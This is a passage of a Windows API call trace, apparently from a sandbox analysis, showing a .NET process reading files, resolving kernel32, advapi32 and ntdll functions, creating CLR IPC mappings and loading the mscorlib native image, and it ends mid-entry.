0xb0c [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] GetCurrentThreadId () returned 0xb0c [0077.276] SetEvent (hEvent=0xbc) returned 1 [0077.276] ReadFile (in: hFile=0x128, lpBuffer=0xb227f0, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x6eefbc, lpOverlapped=0x0 | out: lpBuffer=0xb227f0*, lpNumberOfBytesRead=0x6eefbc*=0xfff, lpOverlapped=0x0) returned 1 [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] GetCurrentThreadId () returned 0xb0c [0077.312] SetEvent (hEvent=0xbc) returned 1 [0077.312] ReadFile (in: hFile=0x128, lpBuffer=0xb207e8, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x6eefa4, lpOverlapped=0x0 | out: lpBuffer=0xb207e8*, lpNumberOfBytesRead=0x6eefa4*=0x17f7, lpOverlapped=0x0) returned 1 [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] GetCurrentThreadId () returned 0xb0c [0077.315] SetEvent (hEvent=0xbc) returned 1 [0077.315] ReadFile (in: hFile=0x128, lpBuffer=0xb207e8, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x6eefb4, lpOverlapped=0x0 | out: lpBuffer=0xb207e8*, lpNumberOfBytesRead=0x6eefb4*=0x1001, lpOverlapped=0x0) returned 1 [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] GetCurrentThreadId () returned 0xb0c [0077.317] SetEvent (hEvent=0xbc) returned 1 [0077.317] ReadFile (in: hFile=0x128, lpBuffer=0xb207e8, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x6eefb4, lpOverlapped=0x0 | out: lpBuffer=0xb207e8*, lpNumberOfBytesRead=0x6eefb4*=0x1002, lpOverlapped=0x0) returned 1 [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] GetCurrentThreadId () returned 0xb0c [0077.318] SetEvent (hEvent=0xbc) returned 1 [0077.318] ReadFile (in: hFile=0x128, lpBuffer=0xb27b78, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x6eefa8, lpOverlapped=0x0 | out: lpBuffer=0xb27b78*, lpNumberOfBytesRead=0x6eefa8*=0x1f28, lpOverlapped=0x0) returned 1 [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] ResetEvent (hEvent=0xb8) returned 1 [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] ResetEvent (hEvent=0xb8) returned 1 [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] GetCurrentThreadId () returned 0xb0c [0077.320] SetEvent (hEvent=0xbc) returned 1 [0077.320] SetEvent (hEvent=0xb8) returned 1 [0077.321] CloseHandle (hObject=0x128) returned 1 [0077.321] SysReAllocStringLen (in: pbstr=0x6ef524*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ef524*="kernel32") returned 1 [0077.321] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0077.321] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0077.324] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumaHighestNodeNumber") returned 0x76dc20b2 [0077.327] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ab4, cbMultiByte=8, lpWideCharStr=0x6ee4fc, cchWideChar=2047 | out: lpWideCharStr="kernel32indows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll") returned 8 [0077.327] SysReAllocStringLen (in: pbstr=0x6ef500*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ef500*="kernel32") returned 1 [0077.327] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0077.327] GetModuleHandleA (lpModuleName="kernel32") returned 0x76d30000 [0077.330] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0077.334] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0077.337] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0077.340] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0077.354] SysReAllocStringLen (in: pbstr=0x6eec3c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6eec3c*="KERNEL32.DLL") returned 1 [0077.354] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.354] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.356] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemWindowsDirectoryW") returned 0x76d45213 [0077.358] SysReAllocStringLen (in: pbstr=0x6eef68*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6eef68*="advapi32") returned 1 [0077.358] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0077.358] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0077.358] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0077.359] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0077.359] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] ResetEvent (hEvent=0xb8) returned 1 [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] ResetEvent (hEvent=0xb8) returned 1 [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] SetEvent (hEvent=0xbc) returned 1 [0077.359] SetEvent (hEvent=0xb8) returned 1 [0077.359] CloseHandle (hObject=0x144) returned 1 [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] ResetEvent (hEvent=0xb8) returned 1 [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.359] GetCurrentThreadId () returned 0xb0c [0077.360] ResetEvent (hEvent=0xb8) returned 1 [0077.360] GetCurrentThreadId () returned 0xb0c [0077.360] GetCurrentThreadId () returned 0xb0c [0077.360] SetEvent (hEvent=0xbc) returned 1 [0077.360] SetEvent (hEvent=0xb8) returned 1 [0077.360] CloseHandle (hObject=0x148) returned 1 [0077.360] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0077.360] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0077.360] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0077.362] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0xb13f28, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x390, lpName="Global\\Cor_Private_IPCBlock_v4_3040") returned 0x148 [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] ResetEvent (hEvent=0xb8) returned 1 [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] ResetEvent (hEvent=0xb8) returned 1 [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] SetEvent (hEvent=0xbc) returned 1 [0077.363] SetEvent (hEvent=0xb8) returned 1 [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] GetCurrentThreadId () returned 0xb0c [0077.363] SetEvent (hEvent=0xbc) returned 1 [0077.363] MapViewOfFile (hFileMappingObject=0x148, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xb0000 [0077.363] SysReAllocStringLen (in: pbstr=0x6eef68*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6eef68*="advapi32") returned 1 [0077.364] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0077.364] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0077.364] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0077.364] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0077.364] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0077.364] GetCurrentThreadId () returned 0xb0c [0077.364] ResetEvent (hEvent=0xb8) returned 1 [0077.364] GetCurrentThreadId () returned 0xb0c [0077.364] GetCurrentThreadId () returned 0xb0c [0077.364] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] ResetEvent (hEvent=0xb8) returned 1 [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] SetEvent (hEvent=0xbc) returned 1 [0077.365] SetEvent (hEvent=0xb8) returned 1 [0077.365] CloseHandle (hObject=0x144) returned 1 [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] ResetEvent (hEvent=0xb8) returned 1 [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] ResetEvent (hEvent=0xb8) returned 1 [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] GetCurrentThreadId () returned 0xb0c [0077.365] SetEvent (hEvent=0xbc) returned 1 [0077.365] SetEvent (hEvent=0xb8) returned 1 [0077.365] CloseHandle (hObject=0x14c) returned 1 [0077.365] SysReAllocStringLen (in: pbstr=0x6eecd0*=0x0, psz="combase.dll", len=0xb | out: pbstr=0x6eecd0*="combase.dll") returned 1 [0077.365] CharLowerBuffW (in: lpsz="combase.dll", cchLength=0xb | out: lpsz="combase.dll") returned 0xb [0077.366] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\combase.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0077.366] GetLastError () returned 0x7e [0077.366] SetLastError (dwErrCode=0x7e) [0077.367] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0077.367] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0077.368] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0077.368] SysReAllocStringLen (in: pbstr=0x6eef38*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6eef38*="kernel32.dll") returned 1 [0077.368] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.368] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0077.370] GetProcAddress (hModule=0x76d30000, lpProcName="AddSIDToBoundaryDescriptor") returned 0x76d6918b [0077.372] GetProcAddress (hModule=0x76d30000, lpProcName="CreateBoundaryDescriptorW") returned 0x76d5ec09 [0077.374] GetProcAddress (hModule=0x76d30000, lpProcName="CreatePrivateNamespaceW") returned 0x76d60a8d [0077.376] GetProcAddress (hModule=0x76d30000, lpProcName="OpenPrivateNamespaceW") returned 0x76d6b0a4 [0077.380] SysReAllocStringLen (in: pbstr=0x6eee68*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x6eee68*="advapi32") returned 1 [0077.380] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0077.380] GetModuleHandleW (lpModuleName="advapi32") returned 0x77710000 [0077.381] GetProcAddress (hModule=0x77710000, lpProcName="AllocateAndInitializeSid") returned 0x777240e6 [0077.381] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0077.381] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] ResetEvent (hEvent=0xb8) returned 1 [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] ResetEvent (hEvent=0xb8) returned 1 [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] SetEvent (hEvent=0xbc) returned 1 [0077.381] SetEvent (hEvent=0xb8) returned 1 [0077.381] CloseHandle (hObject=0x14c) returned 1 [0077.381] GetCurrentThreadId () returned 0xb0c [0077.381] ResetEvent (hEvent=0xb8) returned 1 [0077.381] GetCurrentThreadId () returned 0xb0c [0077.382] GetCurrentThreadId () returned 0xb0c [0077.382] GetCurrentThreadId () returned 0xb0c [0077.382] GetCurrentThreadId () returned 0xb0c [0077.382] ResetEvent (hEvent=0xb8) returned 1 [0077.382] GetCurrentThreadId () returned 0xb0c [0077.382] GetCurrentThreadId () returned 0xb0c [0077.382] SetEvent (hEvent=0xbc) returned 1 [0077.382] SetEvent (hEvent=0xb8) returned 1 [0077.382] CloseHandle (hObject=0x144) returned 1 [0077.382] GetProcAddress (hModule=0x77710000, lpProcName="InitializeAcl") returned 0x777245cd [0077.382] GetProcAddress (hModule=0x77710000, lpProcName="AddAccessAllowedAce") returned 0x77724176 [0077.382] GetProcAddress (hModule=0x77710000, lpProcName="FreeSid") returned 0x7772412e [0077.383] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0xb13f58, flProtect=0x8000004, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10000, lpName="Cor_CLR_WRITER\\Cor_SxSPublic_IPCBlock") returned 0x14c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] ResetEvent (hEvent=0xb8) returned 1 [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] ResetEvent (hEvent=0xb8) returned 1 [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] SetEvent (hEvent=0xbc) returned 1 [0077.383] SetEvent (hEvent=0xb8) returned 1 [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.383] GetCurrentThreadId () returned 0xb0c [0077.384] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0077.384] GetCurrentThreadId () returned 0xb0c [0077.384] GetCurrentThreadId () returned 0xb0c [0077.384] GetCurrentThreadId () returned 0xb0c [0077.384] SetEvent (hEvent=0xbc) returned 1 [0077.384] MapViewOfFile (hFileMappingObject=0x14c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x500000 [0077.384] SysReAllocStringLen (in: pbstr=0x6ef048*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ef048*="kernel32.dll") returned 1 [0077.384] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.384] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0077.386] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteBoundaryDescriptor") returned 0x77c6e66d [0077.398] SysReAllocStringLen (in: pbstr=0x6ef2e0*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ef2e0*="kernel32") returned 1 [0077.398] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0077.398] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0077.400] GetProcAddress (hModule=0x76d30000, lpProcName="WerRegisterRuntimeExceptionModule") returned 0x76dce065 [0077.403] SysReAllocStringLen (in: pbstr=0x6eeff0*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6eeff0*="kernel32.dll") returned 1 [0077.403] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.403] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0077.405] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0077.407] SysReAllocStringLen (in: pbstr=0x6ef530*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x6ef530*="mscoree.dll") returned 1 [0077.407] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0077.407] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x75620000 [0077.407] GetProcAddress (hModule=0x75620000, lpProcName=0x18) returned 0x75628017 [0077.407] GetProcAddress (hModule=0x754f0000, lpProcName=0x18) returned 0x754fd902 [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] ResetEvent (hEvent=0xb8) returned 1 [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] ResetEvent (hEvent=0xb8) returned 1 [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] GetCurrentThreadId () returned 0xb0c [0077.408] SetEvent (hEvent=0xbc) returned 1 [0077.408] SetEvent (hEvent=0xb8) returned 1 [0077.408] CloseHandle (hObject=0x0) returned 0 [0077.410] SysReAllocStringLen (in: pbstr=0x6ef350*=0x0, psz="api-ms-win-core-memory-l1-1-0.dll", len=0x21 | out: pbstr=0x6ef350*="api-ms-win-core-memory-l1-1-0.dll") returned 1 [0077.410] CharLowerBuffW (in: lpsz="api-ms-win-core-memory-l1-1-0.dll", cchLength=0x21 | out: lpsz="api-ms-win-core-memory-l1-1-0.dll") returned 0x21 [0077.410] GetModuleHandleW (lpModuleName="api-ms-win-core-memory-l1-1-0.dll") returned 0x76c10000 [0077.410] SysReAllocStringLen (in: pbstr=0x6ef350*=0x0, psz="api-ms-win-core-libraryloader-l1-1-0.dll", len=0x28 | out: pbstr=0x6ef350*="api-ms-win-core-libraryloader-l1-1-0.dll") returned 1 [0077.410] CharLowerBuffW (in: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x28 [0077.410] GetModuleHandleW (lpModuleName="api-ms-win-core-libraryloader-l1-1-0.dll") returned 0x76c10000 [0077.410] SysReAllocStringLen (in: pbstr=0x6ef350*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x6ef350*="ntdll.dll") returned 1 [0077.411] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0077.411] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0077.411] GetProcAddress (hModule=0x76c10000, lpProcName="SetSystemFileCacheSize") returned 0x0 [0077.413] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetSystemInformation") returned 0x77c61bd4 [0077.424] GetProcAddress (hModule=0x76c10000, lpProcName="PrivIsDllSynchronizationHeld") returned 0x0 [0077.427] SysReAllocStringLen (in: pbstr=0x6ef4e8*=0x0, psz="kernel32", len=0x8 | out: pbstr=0x6ef4e8*="kernel32") returned 1 [0077.427] CharLowerBuffW (in: lpsz="kernel32", cchLength=0x8 | out: lpsz="kernel32") returned 0x8 [0077.428] GetModuleHandleW (lpModuleName="kernel32") returned 0x76d30000 [0077.430] GetProcAddress (hModule=0x76d30000, lpProcName="AddDllDirectory") returned 0x0 [0078.955] SysReAllocStringLen (in: pbstr=0x6ee950*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x6ee950*="kernel32.dll") returned 1 [0078.955] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0078.956] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0078.958] GetProcAddress (hModule=0x76d30000, lpProcName="GetNativeSystemInfo") returned 0x76d510b5 [0078.971] CreateFileW (lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0078.972] GetLastError () returned 0x0 [0078.972] SysReAllocStringLen (in: pbstr=0x6ee9f8*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x6ee9f8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0078.972] GetThreadLocale () returned 0x409 [0078.972] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0078.972] GetThreadLocale () returned 0x409 [0078.972] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0078.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x6ee77c, lpFilePart=0x6ee778 | out: lpBuffer="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", lpFilePart=0x6ee778*="mscorlib.ni.dll.aux") returned 0x6c [0078.973] SysReAllocStringLen (in: pbstr=0x6ee9f8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x6ee9f8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0078.973] SysReAllocStringLen (in: pbstr=0x6ee9a8*=0x0, psz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x6ee9a8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0078.973] CharLowerBuffW (in: lpsz="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", cchLength=0x6c | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 0x6c [0078.973] SysReAllocStringLen (in: pbstr=0x6ee9f8*="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux", len=0x6c | out: pbstr=0x6ee9f8*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll.aux") returned 1 [0078.973] SetLastError (dwErrCode=0x0) [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] SetEvent (hEvent=0xbc) returned 1 [0078.973] GetFileSize (in: hFile=0x230, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xb0 [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] GetCurrentThreadId () returned 0xb0c [0078.973] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0078.973] GetCurrentThreadId () returned 0xb0c [0078.974] GetCurrentThreadId () returned 0xb0c [0078.974] GetCurrentThreadId () returned 0xb0c [0078.974] SetEvent (hEvent=0xbc) returned 1 [0078.974] ReadFile (in: hFile=0x230, lpBuffer=0x6eeb10, nNumberOfBytesToRead=0xb0, lpNumberOfBytesRead=0x6eeaac, lpOverlapped=0x0 | out: lpBuffer=0x6eeb10*, lpNumberOfBytesRead=0x6eeaac*=0xb0, lpOverlapped=0x0) returned 1 [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] ResetEvent (hEvent=0xb8) returned 1 [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] ResetEvent (hEvent=0xb8) returned 1 [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] GetCurrentThreadId () returned 0xb0c [0078.975] SetEvent (hEvent=0xbc) returned 1 [0078.975] SetEvent (hEvent=0xb8) returned 1 [0078.975] CloseHandle (hObject=0x230) returned 1 [0078.978] SysReAllocStringLen (in: pbstr=0x6edfb0*=0x0, psz="mscorlib.ni.dll", len=0xf | out: pbstr=0x6edfb0*="mscorlib.ni.dll") returned 1 [0078.978] CharLowerBuffW (in: lpsz="mscorlib.ni.dll", cchLength=0xf | out: lpsz="mscorlib.ni.dll") returned 0xf [0078.979] LoadLibraryExW (lpLibFileName="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\b7a12c4c0032847fcc6b9c710460456f\\mscorlib.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x72f60000 [0079.297] GetLastError () returned 0x0 [0079.386] CreateFileW 